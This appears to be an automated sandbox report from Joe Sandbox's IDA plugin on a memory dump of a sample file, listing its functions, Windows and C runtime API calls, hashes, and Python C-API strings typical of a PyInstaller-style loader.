Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: c77ad4f46475d30c5088ec27f317409ecb6bdeab6c1681986e041755f947e590
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 8A118661A18A8181DA10AB59AC54169A351EB45FF4F944331FE7D077E5CE7CD0618F50

Function 00007FF72B8D2620 Relevance: 3.0, APIs: 2, Instructions: 38windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8D9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B8D45F4,00000000,00007FF72B8D1985), ref: 00007FF72B8D93C9

MessageBoxW.USER32 ref: 00007FF72B8D267B
MessageBoxA.USER32 ref: 00007FF72B8D268A

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID:
API String ID: 1878133881-0
Opcode ID: 516091698330144c171d35b2bbe34a92ef9056074b99cc756242dd1ed7aaaa5e
Instruction ID: a617b4a520d2ae94ff019d1e186f991a6eb08d4765e86ebd0d35a02abeb596fa
Opcode Fuzzy Hash: 516091698330144c171d35b2bbe34a92ef9056074b99cc756242dd1ed7aaaa5e
Instruction Fuzzy Hash: 9C01F762B04B8285E620AB29FC083A99364FF5DBC4FC44036DE4D07769EE2CD514CF60

Function 00007FF72B8EA948 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA95E
GetLastError.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA968

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: 1f5c7f153343cf0f4f1aa88531e362ee699768ad7b3a14199a732a610f7504ca
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: 39E08610F1928242FF047BFA9C451389251DFD8B00FC84030E82D462B1ED3C68618FB0

Function 00007FF72B8EBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EBED4

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 7a6f6b4603a9e5d9ce79d5380e24987dbb4674ea0fe9f41af404b33429e7a2ec
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: BB41B8329186C187EA34AA6DE980179B7E0EB55B44F940131FA9E476E1CF7CE412CFA1

Function 00007FF72B8D7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF72B8D803A

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 10e7562e960f8d99c449f474851a74073af959b335e7b5ea493964aac480507e
Instruction ID: 573ea8efdd5ced66f2bbdc4c9127c177c475d6e28cbd7525800de1b79dda0410
Opcode Fuzzy Hash: 10e7562e960f8d99c449f474851a74073af959b335e7b5ea493964aac480507e
Instruction Fuzzy Hash: 7721A221B1869246EA10BA6A6C047BAD651FF45FD4FCC4831EE0C07796CE7DF851CB90

Function 00007FF72B8EB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EB9C2

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction ID: c366781705c6da18860b705d59e1fb4b9fe2c25167d3c47e5bc244d910ba9ee8
Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
Instruction Fuzzy Hash: 27317022E1869285E7117B998C8137CAA90EF84BA4FD60135F95D073E2DE7CE4618FB1

Function 00007FF72B8E9961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF72B8E998F

Part of subcall function 00007FF72B8E9A88: GetModuleHandleExW.KERNEL32 ref: 00007FF72B8E9AAD
Part of subcall function 00007FF72B8E9A88: GetProcAddress.KERNEL32 ref: 00007FF72B8E9AC3
Part of subcall function 00007FF72B8E9A88: FreeLibrary.KERNEL32 ref: 00007FF72B8E9AEA

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: 10feab5a90f84a908fa07507b7ff9917432793431ef952591c05441842527ec7
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: 4F219272E0478589EB24AFA8C8806FC73A4FB44718F844636E76D06AE6DF7CD554CB90

Function 00007FF72B8E5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E5EF9

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: f6de8b4d22daed0bd73333f0d4fb35443b6fd00b4ef8fb15206bf2496e859aba
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 78113321A1C6C241EA60BF9998011BDE2A4FF85B84F844431FA4C5BAA7CF7DD5204BA0

Function 00007FF72B8F6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F6377

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: 48224d8cee4f86b3c12d462bfddbd0a93ca2fffe0d80d6cffbcf9751cbf26897
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 55219232A18A8186DB61AF1CD840379B6A0FB94B54FA44334E65D876E9DF3DE421CF50

Function 00007FF72B8E03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E0410

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: b5fe5809a15274a3f379d8efb0d3231e0b4d39ee3fdfcc6593292847fba0e850
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 7301C861A0878140E604FF9A5D020B9E691FF95FE8F884631FE6C17BE6CE3CD4218B60

Function 00007FF72B8EEB98 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72B8EB32A,?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A), ref: 00007FF72B8EEBED

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: e3fdd80fbc128a325bae886fd0c6facef21b1daf1a0733f9a0628d5d7b48d945
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: FBF06255F0D28240FE9876ED9C512B49290DFD9B41FCC8530E90F963F1DE5CE4A08A70

Function 00007FF72B8ED5FC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF72B8E0C90,?,?,?,00007FF72B8E22FA,?,?,?,?,?,00007FF72B8E3AE9), ref: 00007FF72B8ED63A

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: ba37cb2c313dd1a8bdc10e6266d36ad556c4f36044222caa6d44053b06d4d278
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 9CF0DA10F1928685FE5476E99C416799190DF987A0FC84630E92E492F2EF6CA4A49AF0

Non-executed Functions

Function 00007FF72B8D5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5840
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5852
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5889
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D589B
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D58B4
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D58C6
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D58DF
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D58F1
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D590D
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D591F
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D593B
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D594D
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5969
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D597B
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5997
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D59A9
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D59C5
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D59D7

Strings

Py_ExitStatusException, xrefs: 00007FF72B8D58AA, 00007FF72B8D58CC
PyUnicode_Join, xrefs: 00007FF72B8D5FA9, 00007FF72B8D5FCB
PySys_GetObject, xrefs: 00007FF72B8D5E67, 00007FF72B8D5E89
Failed to get address for %hs, xrefs: 00007FF72B8D5861
PyErr_Occurred, xrefs: 00007FF72B8D5B2B, 00007FF72B8D5B4D
PyConfig_Read, xrefs: 00007FF72B8D59E9, 00007FF72B8D5A0B
PyUnicode_Replace, xrefs: 00007FF72B8D5FD7, 00007FF72B8D5FF9
PyConfig_SetBytesString, xrefs: 00007FF72B8D5A17, 00007FF72B8D5A39
GetProcAddress, xrefs: 00007FF72B8D5868
PyImport_ImportModule, xrefs: 00007FF72B8D5C3F, 00007FF72B8D5C61
PyConfig_InitIsolatedConfig, xrefs: 00007FF72B8D59BB, 00007FF72B8D59DD
PyConfig_Clear, xrefs: 00007FF72B8D598D, 00007FF72B8D59AF
PyErr_Restore, xrefs: 00007FF72B8D5B87, 00007FF72B8D5BA9
PyObject_CallFunctionObjArgs, xrefs: 00007FF72B8D5D25, 00007FF72B8D5D47
PyErr_Fetch, xrefs: 00007FF72B8D5ACF, 00007FF72B8D5AF1
PyEval_EvalCode, xrefs: 00007FF72B8D5BB5, 00007FF72B8D5BD7
PyUnicode_Decode, xrefs: 00007FF72B8D5EF1, 00007FF72B8D5F13
PyObject_Str, xrefs: 00007FF72B8D5DAF, 00007FF72B8D5DD1
PyUnicode_FromString, xrefs: 00007FF72B8D5F7B, 00007FF72B8D5F9D
PyObject_SetAttrString, xrefs: 00007FF72B8D5D81, 00007FF72B8D5DA3
PyImport_AddModule, xrefs: 00007FF72B8D5BE3, 00007FF72B8D5C05
PyUnicode_FromFormat, xrefs: 00007FF72B8D5F4D, 00007FF72B8D5F6F
PyRun_SimpleStringFlags, xrefs: 00007FF72B8D5E0B, 00007FF72B8D5E2D
Py_IsInitialized, xrefs: 00007FF72B8D5931, 00007FF72B8D5953
PyUnicode_DecodeFSDefault, xrefs: 00007FF72B8D5F1F, 00007FF72B8D5F41
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF72B8D5DDD, 00007FF72B8D5DFF
PyObject_GetAttrString, xrefs: 00007FF72B8D5D53, 00007FF72B8D5D75
PySys_SetObject, xrefs: 00007FF72B8D5E95, 00007FF72B8D5EB7
PyUnicode_AsUTF8, xrefs: 00007FF72B8D5EC3, 00007FF72B8D5EE5
PyObject_CallFunction, xrefs: 00007FF72B8D5CF7, 00007FF72B8D5D19
PyErr_Print, xrefs: 00007FF72B8D5B59, 00007FF72B8D5B7B
PyModule_GetDict, xrefs: 00007FF72B8D5CC9, 00007FF72B8D5CEB
PyMem_RawFree, xrefs: 00007FF72B8D5C9B, 00007FF72B8D5CBD
PyConfig_SetString, xrefs: 00007FF72B8D5A45, 00007FF72B8D5A67
PyErr_Clear, xrefs: 00007FF72B8D5AA1, 00007FF72B8D5AC3
Py_DecRef, xrefs: 00007FF72B8D5836, 00007FF72B8D5858
PyStatus_Exception, xrefs: 00007FF72B8D5E39, 00007FF72B8D5E5B
Py_InitializeFromConfig, xrefs: 00007FF72B8D5903, 00007FF72B8D5925
PyConfig_SetWideStringList, xrefs: 00007FF72B8D5A73, 00007FF72B8D5A95
PyMarshal_ReadObjectFromString, xrefs: 00007FF72B8D5C6D, 00007FF72B8D5C8F
Py_PreInitialize, xrefs: 00007FF72B8D595F, 00007FF72B8D5981
PyImport_ExecCodeModule, xrefs: 00007FF72B8D5C11, 00007FF72B8D5C33
PyErr_NormalizeException, xrefs: 00007FF72B8D5AFD, 00007FF72B8D5B1F
Py_Finalize, xrefs: 00007FF72B8D58D5, 00007FF72B8D58F7
Py_DecodeLocale, xrefs: 00007FF72B8D587F, 00007FF72B8D58A1

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: bf6f4a30141ebada8e2513b71b201af37f4357c0f9e019f39df34de048ed5f15
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: 4922A264A09B07D1FA15FB6DAC505B5A2A0EF68781FC41036C95E02671FF3CB6689FB0

Function 00007FF72B8F40AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF72B8F40FA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F4766
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F48DC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F4B9A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F4DBA
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F4FF7
memcpy_s.LIBCPMT ref: 00007FF72B8F50D2
memcpy_s.LIBCPMT ref: 00007FF72B8F517D
memcpy_s.LIBCPMT ref: 00007FF72B8F524C

Strings

1#SNAN, xrefs: 00007FF72B8F420A
1#INF, xrefs: 00007FF72B8F4223
1#IND, xrefs: 00007FF72B8F41E7
1#QNAN, xrefs: 00007FF72B8F4213

Memory Dump Source

Source File: 00000000.00000002.2073588162.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000000.00000002.2073496354.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073634482.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073712245.00007FF72B912000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073779497.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction ID: ff82065abd8abc02cb0950a8d806696f10ad46aac5220ce669e0c6eb04b6c660
Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
Instruction Fuzzy Hash: F9B2C672F182828BE7249E68D8407FDB7A1FB64344FD85136DA0D57AA5DB38B910CF90

